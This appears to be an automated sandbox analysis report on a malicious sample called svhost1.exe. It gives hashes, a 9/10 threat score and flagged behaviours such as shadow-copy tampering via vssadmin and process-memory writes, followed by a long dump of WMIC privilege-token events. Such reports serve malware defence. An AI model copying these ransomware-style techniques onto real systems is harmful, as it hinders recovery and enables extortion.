Analysis
- max time kernel: 45s
- max time network: 52s
- platform: windows7_x64
- resource: win7v200430
- submitted: 09/05/2020, 18:48
Static task: static1
Behavioral task: behavioral1
- Sample: svhost1.exe
- Resource: win7v200430
- 0 signatures
- 0 seconds
Behavioral task: behavioral2
- Sample: svhost1.exe
- Resource: win10v200430
- 0 signatures
- 0 seconds
General
- Target: svhost1.exe
- Size: 2.8MB
- MD5: 0527539f8c9af38ea8c36e9d2be595cd
- SHA1: a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
- SHA256: 247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
- SHA512: 00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4
Score: 9/10
Malware Config
Signatures
- Runs net.exe
- Interacts with shadow copies 2 TTPs 1 IoCs
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid: 1616, Process: vssadmin.exe
- Suspicious use of WriteProcessMemory 141 IoCs
- Suspicious use of AdjustPrivilegeToken 1565 IoCs
WMIC.exe Token: 34 1592 WMIC.exe Token: 35 1592 WMIC.exe Token: SeIncreaseQuotaPrivilege 1192 WMIC.exe Token: SeSecurityPrivilege 1192 WMIC.exe Token: SeTakeOwnershipPrivilege 1192 WMIC.exe Token: SeLoadDriverPrivilege 1192 WMIC.exe Token: SeSystemProfilePrivilege 1192 WMIC.exe Token: SeSystemtimePrivilege 1192 WMIC.exe Token: SeProfSingleProcessPrivilege 1192 WMIC.exe Token: SeIncBasePriorityPrivilege 1192 WMIC.exe Token: SeCreatePagefilePrivilege 1192 WMIC.exe Token: SeBackupPrivilege 1192 WMIC.exe Token: SeRestorePrivilege 1192 WMIC.exe Token: SeShutdownPrivilege 1192 WMIC.exe Token: SeDebugPrivilege 1192 WMIC.exe Token: SeSystemEnvironmentPrivilege 1192 WMIC.exe Token: SeRemoteShutdownPrivilege 1192 WMIC.exe Token: SeUndockPrivilege 1192 WMIC.exe Token: SeManageVolumePrivilege 1192 WMIC.exe Token: 33 1192 WMIC.exe Token: 34 1192 WMIC.exe Token: 35 1192 WMIC.exe Token: SeIncreaseQuotaPrivilege 1192 WMIC.exe Token: SeSecurityPrivilege 1192 WMIC.exe Token: SeTakeOwnershipPrivilege 1192 WMIC.exe Token: SeLoadDriverPrivilege 1192 WMIC.exe Token: SeSystemProfilePrivilege 1192 WMIC.exe Token: SeSystemtimePrivilege 1192 WMIC.exe Token: SeProfSingleProcessPrivilege 1192 WMIC.exe Token: SeIncBasePriorityPrivilege 1192 WMIC.exe Token: SeCreatePagefilePrivilege 1192 WMIC.exe Token: SeBackupPrivilege 1192 WMIC.exe Token: SeRestorePrivilege 1192 WMIC.exe Token: SeShutdownPrivilege 1192 WMIC.exe Token: SeDebugPrivilege 1192 WMIC.exe Token: SeSystemEnvironmentPrivilege 1192 WMIC.exe Token: SeRemoteShutdownPrivilege 1192 WMIC.exe Token: SeUndockPrivilege 1192 WMIC.exe Token: SeManageVolumePrivilege 1192 WMIC.exe Token: 33 1192 WMIC.exe Token: 34 1192 WMIC.exe Token: 35 1192 WMIC.exe Token: SeIncreaseQuotaPrivilege 1572 WMIC.exe Token: SeSecurityPrivilege 1572 WMIC.exe Token: SeTakeOwnershipPrivilege 1572 WMIC.exe Token: SeLoadDriverPrivilege 1572 WMIC.exe Token: SeSystemProfilePrivilege 1572 WMIC.exe Token: SeSystemtimePrivilege 1572 WMIC.exe Token: SeProfSingleProcessPrivilege 
1572 WMIC.exe Token: SeIncBasePriorityPrivilege 1572 WMIC.exe Token: SeCreatePagefilePrivilege 1572 WMIC.exe Token: SeBackupPrivilege 1572 WMIC.exe Token: SeRestorePrivilege 1572 WMIC.exe Token: SeShutdownPrivilege 1572 WMIC.exe Token: SeDebugPrivilege 1572 WMIC.exe Token: SeSystemEnvironmentPrivilege 1572 WMIC.exe Token: SeRemoteShutdownPrivilege 1572 WMIC.exe Token: SeUndockPrivilege 1572 WMIC.exe Token: SeManageVolumePrivilege 1572 WMIC.exe Token: 33 1572 WMIC.exe Token: 34 1572 WMIC.exe Token: 35 1572 WMIC.exe Token: SeIncreaseQuotaPrivilege 1572 WMIC.exe Token: SeSecurityPrivilege 1572 WMIC.exe Token: SeTakeOwnershipPrivilege 1572 WMIC.exe Token: SeLoadDriverPrivilege 1572 WMIC.exe Token: SeSystemProfilePrivilege 1572 WMIC.exe Token: SeSystemtimePrivilege 1572 WMIC.exe Token: SeProfSingleProcessPrivilege 1572 WMIC.exe Token: SeIncBasePriorityPrivilege 1572 WMIC.exe Token: SeCreatePagefilePrivilege 1572 WMIC.exe Token: SeBackupPrivilege 1572 WMIC.exe Token: SeRestorePrivilege 1572 WMIC.exe Token: SeShutdownPrivilege 1572 WMIC.exe Token: SeDebugPrivilege 1572 WMIC.exe Token: SeSystemEnvironmentPrivilege 1572 WMIC.exe Token: SeRemoteShutdownPrivilege 1572 WMIC.exe Token: SeUndockPrivilege 1572 WMIC.exe Token: SeManageVolumePrivilege 1572 WMIC.exe Token: 33 1572 WMIC.exe Token: 34 1572 WMIC.exe Token: 35 1572 WMIC.exe Token: SeIncreaseQuotaPrivilege 1880 WMIC.exe Token: SeSecurityPrivilege 1880 WMIC.exe Token: SeTakeOwnershipPrivilege 1880 WMIC.exe Token: SeLoadDriverPrivilege 1880 WMIC.exe Token: SeSystemProfilePrivilege 1880 WMIC.exe Token: SeSystemtimePrivilege 1880 WMIC.exe Token: SeProfSingleProcessPrivilege 1880 WMIC.exe Token: SeIncBasePriorityPrivilege 1880 WMIC.exe Token: SeCreatePagefilePrivilege 1880 WMIC.exe Token: SeBackupPrivilege 1880 WMIC.exe Token: SeRestorePrivilege 1880 WMIC.exe Token: SeShutdownPrivilege 1880 WMIC.exe Token: SeDebugPrivilege 1880 WMIC.exe Token: SeSystemEnvironmentPrivilege 1880 WMIC.exe Token: SeRemoteShutdownPrivilege 1880 
WMIC.exe Token: SeUndockPrivilege 1880 WMIC.exe Token: SeManageVolumePrivilege 1880 WMIC.exe Token: 33 1880 WMIC.exe Token: 34 1880 WMIC.exe Token: 35 1880 WMIC.exe Token: SeIncreaseQuotaPrivilege 1880 WMIC.exe Token: SeSecurityPrivilege 1880 WMIC.exe Token: SeTakeOwnershipPrivilege 1880 WMIC.exe Token: SeLoadDriverPrivilege 1880 WMIC.exe Token: SeSystemProfilePrivilege 1880 WMIC.exe Token: SeSystemtimePrivilege 1880 WMIC.exe Token: SeProfSingleProcessPrivilege 1880 WMIC.exe Token: SeIncBasePriorityPrivilege 1880 WMIC.exe Token: SeCreatePagefilePrivilege 1880 WMIC.exe Token: SeBackupPrivilege 1880 WMIC.exe Token: SeRestorePrivilege 1880 WMIC.exe Token: SeShutdownPrivilege 1880 WMIC.exe Token: SeDebugPrivilege 1880 WMIC.exe Token: SeSystemEnvironmentPrivilege 1880 WMIC.exe Token: SeRemoteShutdownPrivilege 1880 WMIC.exe Token: SeUndockPrivilege 1880 WMIC.exe Token: SeManageVolumePrivilege 1880 WMIC.exe Token: 33 1880 WMIC.exe Token: 34 1880 WMIC.exe Token: 35 1880 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: SeSystemProfilePrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeProfSingleProcessPrivilege 1840 WMIC.exe Token: SeIncBasePriorityPrivilege 1840 WMIC.exe Token: SeCreatePagefilePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeDebugPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeRemoteShutdownPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: 33 1840 WMIC.exe Token: 34 1840 WMIC.exe Token: 35 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: 
SeSystemProfilePrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeProfSingleProcessPrivilege 1840 WMIC.exe Token: SeIncBasePriorityPrivilege 1840 WMIC.exe Token: SeCreatePagefilePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeDebugPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeRemoteShutdownPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: 33 1840 WMIC.exe Token: 34 1840 WMIC.exe Token: 35 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1916 WMIC.exe Token: SeSecurityPrivilege 1916 WMIC.exe Token: SeTakeOwnershipPrivilege 1916 WMIC.exe Token: SeLoadDriverPrivilege 1916 WMIC.exe Token: SeSystemProfilePrivilege 1916 WMIC.exe Token: SeSystemtimePrivilege 1916 WMIC.exe Token: SeProfSingleProcessPrivilege 1916 WMIC.exe Token: SeIncBasePriorityPrivilege 1916 WMIC.exe Token: SeCreatePagefilePrivilege 1916 WMIC.exe Token: SeBackupPrivilege 1916 WMIC.exe Token: SeRestorePrivilege 1916 WMIC.exe Token: SeShutdownPrivilege 1916 WMIC.exe Token: SeDebugPrivilege 1916 WMIC.exe Token: SeSystemEnvironmentPrivilege 1916 WMIC.exe Token: SeRemoteShutdownPrivilege 1916 WMIC.exe Token: SeUndockPrivilege 1916 WMIC.exe Token: SeManageVolumePrivilege 1916 WMIC.exe Token: 33 1916 WMIC.exe Token: 34 1916 WMIC.exe Token: 35 1916 WMIC.exe Token: SeIncreaseQuotaPrivilege 1916 WMIC.exe Token: SeSecurityPrivilege 1916 WMIC.exe Token: SeTakeOwnershipPrivilege 1916 WMIC.exe Token: SeLoadDriverPrivilege 1916 WMIC.exe Token: SeSystemProfilePrivilege 1916 WMIC.exe Token: SeSystemtimePrivilege 1916 WMIC.exe Token: SeProfSingleProcessPrivilege 1916 WMIC.exe Token: SeIncBasePriorityPrivilege 1916 WMIC.exe Token: SeCreatePagefilePrivilege 1916 WMIC.exe Token: SeBackupPrivilege 1916 WMIC.exe Token: SeRestorePrivilege 1916 WMIC.exe Token: SeShutdownPrivilege 1916 WMIC.exe Token: 
SeDebugPrivilege 1916 WMIC.exe Token: SeSystemEnvironmentPrivilege 1916 WMIC.exe Token: SeRemoteShutdownPrivilege 1916 WMIC.exe Token: SeUndockPrivilege 1916 WMIC.exe Token: SeManageVolumePrivilege 1916 WMIC.exe Token: 33 1916 WMIC.exe Token: 34 1916 WMIC.exe Token: 35 1916 WMIC.exe Token: SeIncreaseQuotaPrivilege 1264 WMIC.exe Token: SeSecurityPrivilege 1264 WMIC.exe Token: SeTakeOwnershipPrivilege 1264 WMIC.exe Token: SeLoadDriverPrivilege 1264 WMIC.exe Token: SeSystemProfilePrivilege 1264 WMIC.exe Token: SeSystemtimePrivilege 1264 WMIC.exe Token: SeProfSingleProcessPrivilege 1264 WMIC.exe Token: SeIncBasePriorityPrivilege 1264 WMIC.exe Token: SeCreatePagefilePrivilege 1264 WMIC.exe Token: SeBackupPrivilege 1264 WMIC.exe Token: SeRestorePrivilege 1264 WMIC.exe Token: SeShutdownPrivilege 1264 WMIC.exe Token: SeDebugPrivilege 1264 WMIC.exe Token: SeSystemEnvironmentPrivilege 1264 WMIC.exe Token: SeRemoteShutdownPrivilege 1264 WMIC.exe Token: SeUndockPrivilege 1264 WMIC.exe Token: SeManageVolumePrivilege 1264 WMIC.exe Token: 33 1264 WMIC.exe Token: 34 1264 WMIC.exe Token: 35 1264 WMIC.exe Token: SeIncreaseQuotaPrivilege 1264 WMIC.exe Token: SeSecurityPrivilege 1264 WMIC.exe Token: SeTakeOwnershipPrivilege 1264 WMIC.exe Token: SeLoadDriverPrivilege 1264 WMIC.exe Token: SeSystemProfilePrivilege 1264 WMIC.exe Token: SeSystemtimePrivilege 1264 WMIC.exe Token: SeProfSingleProcessPrivilege 1264 WMIC.exe Token: SeIncBasePriorityPrivilege 1264 WMIC.exe Token: SeCreatePagefilePrivilege 1264 WMIC.exe Token: SeBackupPrivilege 1264 WMIC.exe Token: SeRestorePrivilege 1264 WMIC.exe Token: SeShutdownPrivilege 1264 WMIC.exe Token: SeDebugPrivilege 1264 WMIC.exe Token: SeSystemEnvironmentPrivilege 1264 WMIC.exe Token: SeRemoteShutdownPrivilege 1264 WMIC.exe Token: SeUndockPrivilege 1264 WMIC.exe Token: SeManageVolumePrivilege 1264 WMIC.exe Token: 33 1264 WMIC.exe Token: 34 1264 WMIC.exe Token: 35 1264 WMIC.exe Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 
540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: SeIncreaseQuotaPrivilege 2036 WMIC.exe Token: SeSecurityPrivilege 2036 WMIC.exe Token: SeTakeOwnershipPrivilege 2036 WMIC.exe Token: SeLoadDriverPrivilege 2036 WMIC.exe Token: SeSystemProfilePrivilege 2036 WMIC.exe Token: SeSystemtimePrivilege 2036 WMIC.exe Token: SeProfSingleProcessPrivilege 2036 WMIC.exe Token: SeIncBasePriorityPrivilege 2036 WMIC.exe Token: SeCreatePagefilePrivilege 2036 WMIC.exe Token: SeBackupPrivilege 2036 WMIC.exe Token: 
SeRestorePrivilege 2036 WMIC.exe Token: SeShutdownPrivilege 2036 WMIC.exe Token: SeDebugPrivilege 2036 WMIC.exe Token: SeSystemEnvironmentPrivilege 2036 WMIC.exe Token: SeRemoteShutdownPrivilege 2036 WMIC.exe Token: SeUndockPrivilege 2036 WMIC.exe Token: SeManageVolumePrivilege 2036 WMIC.exe Token: 33 2036 WMIC.exe Token: 34 2036 WMIC.exe Token: 35 2036 WMIC.exe Token: SeIncreaseQuotaPrivilege 2036 WMIC.exe Token: SeSecurityPrivilege 2036 WMIC.exe Token: SeTakeOwnershipPrivilege 2036 WMIC.exe Token: SeLoadDriverPrivilege 2036 WMIC.exe Token: SeSystemProfilePrivilege 2036 WMIC.exe Token: SeSystemtimePrivilege 2036 WMIC.exe Token: SeProfSingleProcessPrivilege 2036 WMIC.exe Token: SeIncBasePriorityPrivilege 2036 WMIC.exe Token: SeCreatePagefilePrivilege 2036 WMIC.exe Token: SeBackupPrivilege 2036 WMIC.exe Token: SeRestorePrivilege 2036 WMIC.exe Token: SeShutdownPrivilege 2036 WMIC.exe Token: SeDebugPrivilege 2036 WMIC.exe Token: SeSystemEnvironmentPrivilege 2036 WMIC.exe Token: SeRemoteShutdownPrivilege 2036 WMIC.exe Token: SeUndockPrivilege 2036 WMIC.exe Token: SeManageVolumePrivilege 2036 WMIC.exe Token: 33 2036 WMIC.exe Token: 34 2036 WMIC.exe Token: 35 2036 WMIC.exe Token: SeIncreaseQuotaPrivilege 2012 WMIC.exe Token: SeSecurityPrivilege 2012 WMIC.exe Token: SeTakeOwnershipPrivilege 2012 WMIC.exe Token: SeLoadDriverPrivilege 2012 WMIC.exe Token: SeSystemProfilePrivilege 2012 WMIC.exe Token: SeSystemtimePrivilege 2012 WMIC.exe Token: SeProfSingleProcessPrivilege 2012 WMIC.exe Token: SeIncBasePriorityPrivilege 2012 WMIC.exe Token: SeCreatePagefilePrivilege 2012 WMIC.exe Token: SeBackupPrivilege 2012 WMIC.exe Token: SeRestorePrivilege 2012 WMIC.exe Token: SeShutdownPrivilege 2012 WMIC.exe Token: SeDebugPrivilege 2012 WMIC.exe Token: SeSystemEnvironmentPrivilege 2012 WMIC.exe Token: SeRemoteShutdownPrivilege 2012 WMIC.exe Token: SeUndockPrivilege 2012 WMIC.exe Token: SeManageVolumePrivilege 2012 WMIC.exe Token: 33 2012 WMIC.exe Token: 34 2012 WMIC.exe Token: 35 2012 
WMIC.exe Token: SeIncreaseQuotaPrivilege 2012 WMIC.exe Token: SeSecurityPrivilege 2012 WMIC.exe Token: SeTakeOwnershipPrivilege 2012 WMIC.exe Token: SeLoadDriverPrivilege 2012 WMIC.exe Token: SeSystemProfilePrivilege 2012 WMIC.exe Token: SeSystemtimePrivilege 2012 WMIC.exe Token: SeProfSingleProcessPrivilege 2012 WMIC.exe Token: SeIncBasePriorityPrivilege 2012 WMIC.exe Token: SeCreatePagefilePrivilege 2012 WMIC.exe Token: SeBackupPrivilege 2012 WMIC.exe Token: SeRestorePrivilege 2012 WMIC.exe Token: SeShutdownPrivilege 2012 WMIC.exe Token: SeDebugPrivilege 2012 WMIC.exe Token: SeSystemEnvironmentPrivilege 2012 WMIC.exe Token: SeRemoteShutdownPrivilege 2012 WMIC.exe Token: SeUndockPrivilege 2012 WMIC.exe Token: SeManageVolumePrivilege 2012 WMIC.exe Token: 33 2012 WMIC.exe Token: 34 2012 WMIC.exe Token: 35 2012 WMIC.exe Token: SeIncreaseQuotaPrivilege 1456 WMIC.exe Token: SeSecurityPrivilege 1456 WMIC.exe Token: SeTakeOwnershipPrivilege 1456 WMIC.exe Token: SeLoadDriverPrivilege 1456 WMIC.exe Token: SeSystemProfilePrivilege 1456 WMIC.exe Token: SeSystemtimePrivilege 1456 WMIC.exe Token: SeProfSingleProcessPrivilege 1456 WMIC.exe Token: SeIncBasePriorityPrivilege 1456 WMIC.exe Token: SeCreatePagefilePrivilege 1456 WMIC.exe Token: SeBackupPrivilege 1456 WMIC.exe Token: SeRestorePrivilege 1456 WMIC.exe Token: SeShutdownPrivilege 1456 WMIC.exe Token: SeDebugPrivilege 1456 WMIC.exe Token: SeSystemEnvironmentPrivilege 1456 WMIC.exe Token: SeRemoteShutdownPrivilege 1456 WMIC.exe Token: SeUndockPrivilege 1456 WMIC.exe Token: SeManageVolumePrivilege 1456 WMIC.exe Token: 33 1456 WMIC.exe Token: 34 1456 WMIC.exe Token: 35 1456 WMIC.exe Token: SeIncreaseQuotaPrivilege 1456 WMIC.exe Token: SeSecurityPrivilege 1456 WMIC.exe Token: SeTakeOwnershipPrivilege 1456 WMIC.exe Token: SeLoadDriverPrivilege 1456 WMIC.exe Token: SeSystemProfilePrivilege 1456 WMIC.exe Token: SeSystemtimePrivilege 1456 WMIC.exe Token: SeProfSingleProcessPrivilege 1456 WMIC.exe Token: SeIncBasePriorityPrivilege 
1456 WMIC.exe Token: SeCreatePagefilePrivilege 1456 WMIC.exe Token: SeBackupPrivilege 1456 WMIC.exe Token: SeRestorePrivilege 1456 WMIC.exe Token: SeShutdownPrivilege 1456 WMIC.exe Token: SeDebugPrivilege 1456 WMIC.exe Token: SeSystemEnvironmentPrivilege 1456 WMIC.exe Token: SeRemoteShutdownPrivilege 1456 WMIC.exe Token: SeUndockPrivilege 1456 WMIC.exe Token: SeManageVolumePrivilege 1456 WMIC.exe Token: 33 1456 WMIC.exe Token: 34 1456 WMIC.exe Token: 35 1456 WMIC.exe Token: SeIncreaseQuotaPrivilege 596 WMIC.exe Token: SeSecurityPrivilege 596 WMIC.exe Token: SeTakeOwnershipPrivilege 596 WMIC.exe Token: SeLoadDriverPrivilege 596 WMIC.exe Token: SeSystemProfilePrivilege 596 WMIC.exe Token: SeSystemtimePrivilege 596 WMIC.exe Token: SeProfSingleProcessPrivilege 596 WMIC.exe Token: SeIncBasePriorityPrivilege 596 WMIC.exe Token: SeCreatePagefilePrivilege 596 WMIC.exe Token: SeBackupPrivilege 596 WMIC.exe Token: SeRestorePrivilege 596 WMIC.exe Token: SeShutdownPrivilege 596 WMIC.exe Token: SeDebugPrivilege 596 WMIC.exe Token: SeSystemEnvironmentPrivilege 596 WMIC.exe Token: SeRemoteShutdownPrivilege 596 WMIC.exe Token: SeUndockPrivilege 596 WMIC.exe Token: SeManageVolumePrivilege 596 WMIC.exe Token: 33 596 WMIC.exe Token: 34 596 WMIC.exe Token: 35 596 WMIC.exe Token: SeIncreaseQuotaPrivilege 596 WMIC.exe Token: SeSecurityPrivilege 596 WMIC.exe Token: SeTakeOwnershipPrivilege 596 WMIC.exe Token: SeLoadDriverPrivilege 596 WMIC.exe Token: SeSystemProfilePrivilege 596 WMIC.exe Token: SeSystemtimePrivilege 596 WMIC.exe Token: SeProfSingleProcessPrivilege 596 WMIC.exe Token: SeIncBasePriorityPrivilege 596 WMIC.exe Token: SeCreatePagefilePrivilege 596 WMIC.exe Token: SeBackupPrivilege 596 WMIC.exe Token: SeRestorePrivilege 596 WMIC.exe Token: SeShutdownPrivilege 596 WMIC.exe Token: SeDebugPrivilege 596 WMIC.exe Token: SeSystemEnvironmentPrivilege 596 WMIC.exe Token: SeRemoteShutdownPrivilege 596 WMIC.exe Token: SeUndockPrivilege 596 WMIC.exe Token: SeManageVolumePrivilege 596 
WMIC.exe Token: 33 596 WMIC.exe Token: 34 596 WMIC.exe Token: 35 596 WMIC.exe Token: SeIncreaseQuotaPrivilege 528 WMIC.exe Token: SeSecurityPrivilege 528 WMIC.exe Token: SeTakeOwnershipPrivilege 528 WMIC.exe Token: SeLoadDriverPrivilege 528 WMIC.exe Token: SeSystemProfilePrivilege 528 WMIC.exe Token: SeSystemtimePrivilege 528 WMIC.exe Token: SeProfSingleProcessPrivilege 528 WMIC.exe Token: SeIncBasePriorityPrivilege 528 WMIC.exe Token: SeCreatePagefilePrivilege 528 WMIC.exe Token: SeBackupPrivilege 528 WMIC.exe Token: SeRestorePrivilege 528 WMIC.exe Token: SeShutdownPrivilege 528 WMIC.exe Token: SeDebugPrivilege 528 WMIC.exe Token: SeSystemEnvironmentPrivilege 528 WMIC.exe Token: SeRemoteShutdownPrivilege 528 WMIC.exe Token: SeUndockPrivilege 528 WMIC.exe Token: SeManageVolumePrivilege 528 WMIC.exe Token: 33 528 WMIC.exe Token: 34 528 WMIC.exe Token: 35 528 WMIC.exe Token: SeIncreaseQuotaPrivilege 528 WMIC.exe Token: SeSecurityPrivilege 528 WMIC.exe Token: SeTakeOwnershipPrivilege 528 WMIC.exe Token: SeLoadDriverPrivilege 528 WMIC.exe Token: SeSystemProfilePrivilege 528 WMIC.exe Token: SeSystemtimePrivilege 528 WMIC.exe Token: SeProfSingleProcessPrivilege 528 WMIC.exe Token: SeIncBasePriorityPrivilege 528 WMIC.exe Token: SeCreatePagefilePrivilege 528 WMIC.exe Token: SeBackupPrivilege 528 WMIC.exe Token: SeRestorePrivilege 528 WMIC.exe Token: SeShutdownPrivilege 528 WMIC.exe Token: SeDebugPrivilege 528 WMIC.exe Token: SeSystemEnvironmentPrivilege 528 WMIC.exe Token: SeRemoteShutdownPrivilege 528 WMIC.exe Token: SeUndockPrivilege 528 WMIC.exe Token: SeManageVolumePrivilege 528 WMIC.exe Token: 33 528 WMIC.exe Token: 34 528 WMIC.exe Token: 35 528 WMIC.exe Token: SeIncreaseQuotaPrivilege 204 WMIC.exe Token: SeSecurityPrivilege 204 WMIC.exe Token: SeTakeOwnershipPrivilege 204 WMIC.exe Token: SeLoadDriverPrivilege 204 WMIC.exe Token: SeSystemProfilePrivilege 204 WMIC.exe Token: SeSystemtimePrivilege 204 WMIC.exe Token: SeProfSingleProcessPrivilege 204 WMIC.exe Token: 
SeIncBasePriorityPrivilege 204 WMIC.exe Token: SeCreatePagefilePrivilege 204 WMIC.exe Token: SeBackupPrivilege 204 WMIC.exe Token: SeRestorePrivilege 204 WMIC.exe Token: SeShutdownPrivilege 204 WMIC.exe Token: SeDebugPrivilege 204 WMIC.exe Token: SeSystemEnvironmentPrivilege 204 WMIC.exe Token: SeRemoteShutdownPrivilege 204 WMIC.exe Token: SeUndockPrivilege 204 WMIC.exe Token: SeManageVolumePrivilege 204 WMIC.exe Token: 33 204 WMIC.exe Token: 34 204 WMIC.exe Token: 35 204 WMIC.exe Token: SeIncreaseQuotaPrivilege 204 WMIC.exe Token: SeSecurityPrivilege 204 WMIC.exe Token: SeTakeOwnershipPrivilege 204 WMIC.exe Token: SeLoadDriverPrivilege 204 WMIC.exe Token: SeSystemProfilePrivilege 204 WMIC.exe Token: SeSystemtimePrivilege 204 WMIC.exe Token: SeProfSingleProcessPrivilege 204 WMIC.exe Token: SeIncBasePriorityPrivilege 204 WMIC.exe Token: SeCreatePagefilePrivilege 204 WMIC.exe Token: SeBackupPrivilege 204 WMIC.exe Token: SeRestorePrivilege 204 WMIC.exe Token: SeShutdownPrivilege 204 WMIC.exe Token: SeDebugPrivilege 204 WMIC.exe Token: SeSystemEnvironmentPrivilege 204 WMIC.exe Token: SeRemoteShutdownPrivilege 204 WMIC.exe Token: SeUndockPrivilege 204 WMIC.exe Token: SeManageVolumePrivilege 204 WMIC.exe Token: 33 204 WMIC.exe Token: 34 204 WMIC.exe Token: 35 204 WMIC.exe Token: SeIncreaseQuotaPrivilege 1488 WMIC.exe Token: SeSecurityPrivilege 1488 WMIC.exe Token: SeTakeOwnershipPrivilege 1488 WMIC.exe Token: SeLoadDriverPrivilege 1488 WMIC.exe Token: SeSystemProfilePrivilege 1488 WMIC.exe Token: SeSystemtimePrivilege 1488 WMIC.exe Token: SeProfSingleProcessPrivilege 1488 WMIC.exe Token: SeIncBasePriorityPrivilege 1488 WMIC.exe Token: SeCreatePagefilePrivilege 1488 WMIC.exe Token: SeBackupPrivilege 1488 WMIC.exe Token: SeRestorePrivilege 1488 WMIC.exe Token: SeShutdownPrivilege 1488 WMIC.exe Token: SeDebugPrivilege 1488 WMIC.exe Token: SeSystemEnvironmentPrivilege 1488 WMIC.exe Token: SeRemoteShutdownPrivilege 1488 WMIC.exe Token: SeUndockPrivilege 1488 WMIC.exe Token: 
SeManageVolumePrivilege 1488 WMIC.exe Token: 33 1488 WMIC.exe Token: 34 1488 WMIC.exe Token: 35 1488 WMIC.exe Token: SeIncreaseQuotaPrivilege 1488 WMIC.exe Token: SeSecurityPrivilege 1488 WMIC.exe Token: SeTakeOwnershipPrivilege 1488 WMIC.exe Token: SeLoadDriverPrivilege 1488 WMIC.exe Token: SeSystemProfilePrivilege 1488 WMIC.exe Token: SeSystemtimePrivilege 1488 WMIC.exe Token: SeProfSingleProcessPrivilege 1488 WMIC.exe Token: SeIncBasePriorityPrivilege 1488 WMIC.exe Token: SeCreatePagefilePrivilege 1488 WMIC.exe Token: SeBackupPrivilege 1488 WMIC.exe Token: SeRestorePrivilege 1488 WMIC.exe Token: SeShutdownPrivilege 1488 WMIC.exe Token: SeDebugPrivilege 1488 WMIC.exe Token: SeSystemEnvironmentPrivilege 1488 WMIC.exe Token: SeRemoteShutdownPrivilege 1488 WMIC.exe Token: SeUndockPrivilege 1488 WMIC.exe Token: SeManageVolumePrivilege 1488 WMIC.exe Token: 33 1488 WMIC.exe Token: 34 1488 WMIC.exe Token: 35 1488 WMIC.exe Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeSecurityPrivilege 1580 WMIC.exe Token: SeTakeOwnershipPrivilege 1580 WMIC.exe Token: SeLoadDriverPrivilege 1580 WMIC.exe Token: SeSystemProfilePrivilege 1580 WMIC.exe Token: SeSystemtimePrivilege 1580 WMIC.exe Token: SeProfSingleProcessPrivilege 1580 WMIC.exe Token: SeIncBasePriorityPrivilege 1580 WMIC.exe Token: SeCreatePagefilePrivilege 1580 WMIC.exe Token: SeBackupPrivilege 1580 WMIC.exe Token: SeRestorePrivilege 1580 WMIC.exe Token: SeShutdownPrivilege 1580 WMIC.exe Token: SeDebugPrivilege 1580 WMIC.exe Token: SeSystemEnvironmentPrivilege 1580 WMIC.exe Token: SeRemoteShutdownPrivilege 1580 WMIC.exe Token: SeUndockPrivilege 1580 WMIC.exe Token: 